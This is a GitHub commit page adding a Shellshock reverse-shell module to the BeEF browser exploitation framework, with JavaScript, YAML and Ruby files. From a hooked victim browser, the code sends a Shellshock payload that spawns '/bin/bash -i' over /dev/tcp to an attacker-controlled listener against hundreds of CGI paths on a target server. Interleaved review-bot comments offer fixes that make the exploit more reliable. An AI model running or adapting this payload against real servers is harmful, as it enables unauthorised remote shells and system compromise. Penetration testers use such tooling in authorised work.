
Add Shell Shock Scanner module

1 parent fb57121 commit cc0993a2eb54ae865f5f41c2381cb981fedacff1 @bcoles bcoles committed Oct 30, 2014
@@ -0,0 +1,75 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var rproto = '<%= @rproto %>';
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var lhost = '<%= @lhost %>';
+ var lport = '<%= @lport %>';
+ var target = rproto + '://' + rhost + ':' + rport;
+ var method = '<%= @method %>';
+ var wait = '<%= @wait %>';
+ var timeout = '<%= @timeout %>';
+
+ get_cgi = function(uri) {
+ try {
+ var payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1 &";
+ var xhr = new XMLHttpRequest();
+ xhr.open(method, target+uri, true);
+ xhr.onload = function () {
+ };
+ xhr.onreadystatechange = function () {
+ if (xhr.readyState == 4 && xhr.status == 200) {
+ beef.debug("[command #<%= @command_id %>] Response: " + xhr.response);
+ }
+ }
+ xhr.setRequestHeader("Accept", payload);
+ xhr.send(null);
+ } catch (e){
+ beef.debug("[command #<%= @command_id %>] Something went wrong: " + e.message);
+ }
+ }
+
+ var scripts = new Array(
+<%=
+ scripts = []
+ File.open("#{$root_dir}/modules/exploits/shell_shock_scanner/shocker-cgi_list", 'r') do |file_handle|
+ file_handle.each_line do |line|
+ uri = line.chomp!
+ next if uri =~ /^#/
+ next if uri.nil?
+ scripts << "'#{uri}'"
+ end
+ end
+ scripts.shuffle.join(",\n")
+%>
+);
+
+ // add scripts to queue
+ var requests = [];
+ for (var i=0; i<scripts.length; i++) requests.push(scripts[i]);
+
+ // process queue
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan");
+ var handle = setInterval(function() {
+ if (requests.length > 0) {
+ get_cgi(requests.pop());
+ } else cleanup();
+ }, wait*1000);
+
+ // clean up
+ cleanup = function() {
+ if (handle) {
+ beef.debug("Killing timer [ID: " + handle + "]");
+ clearInterval(handle);
+ handle = 0;
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
+ }
+ }
+ setTimeout("cleanup();", timeout*1000);
+
+});
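Review bot: `get_cgi` and `cleanup` are assigned without `var` (the `get_cgi = function(uri)` and `cleanup = function()` lines), so they become implicit globals on the hooked page's `window` instead of locals of the `beef.execute` callback like `handle` and `requests`; declare both with `var`. The string form `setTimeout("cleanup();", timeout*1000)` is evaluated in global scope and would stop resolving once `cleanup` is a local, so pass the function reference instead: `setTimeout(cleanup, timeout*1000);`. `wait` and `timeout` are ERB-interpolated as quoted strings and only coerced by `*1000`, which yields `NaN` for a non-numeric option value and makes the interval fire immediately; `parseFloat` with a sane fallback would make the failure explicit.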
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ shell_shock_scanner:
+ enable: true
+ category: "Exploits"
+ name: "Shell Shock Scanner (Reverse Shell)"
+ description: "This module attempts to get a reverse shell on the specified web server, blindly, by requesting ~400 potentially vulnerable CGI scripts. Each CGI is requested with a shellshock payload in the 'Accept' HTTP header.<br/>The list of CGI scripts was taken from <a href='https://github.com/nccgroup/shocker'>Shocker</a>."
+ authors: ["Stephane Chazelas", "mz", "bmantra", "bcoles"]
+ target:
+ working: ["ALL"]
@@ -0,0 +1,42 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Shell_shock_scanner < BeEF::Core::Command
+
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+ lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+ lhost = "" if lhost == "0.0.0.0"
+ return [
+ { 'name' => 'method', 'ui_label' => 'HTTP Method', 'value' => 'GET' },
+ { 'name' => 'rproto',
+ 'type' => 'combobox',
+ 'ui_label' => 'Target Protocol',
+ 'store_type' => 'arraystore',
+ 'store_fields' => ['rproto'],
+ 'store_data' => [
+ ['http'],
+ ['https']
+ ],
+ 'emptyText' => 'Select a protocol (HTTP/HTTPS)',
+ 'valueField' => 'rproto',
+ 'displayField' => 'rproto',
+ 'mode' => 'local',
+ 'autoWidth' => true
+ },
+ { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
+ { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+ { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost },
+ { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' },
+ { 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width'=>'100px' },
+ { 'name' => 'timeout', 'ui_label' => 'Scan timeout (s)', 'value' => '180'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
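Review bot: The explicit `return [` in `self.options` is redundant since the array literal is the method's last expression; drop it and let the array be the implicit value. The numeric options (`rport`, `lport`, `wait`, `timeout`) are carried as string defaults and appear to be interpolated directly into the JavaScript template in the first hunk, so a non-numeric value typed into the console produces a broken script rather than a validation error — consider checking these as numeric before rendering. A one-line comment above the `lhost` fallback would also help, e.g. `# prefer the public address; fall back to the bind address unless it is the wildcard 0.0.0.0`.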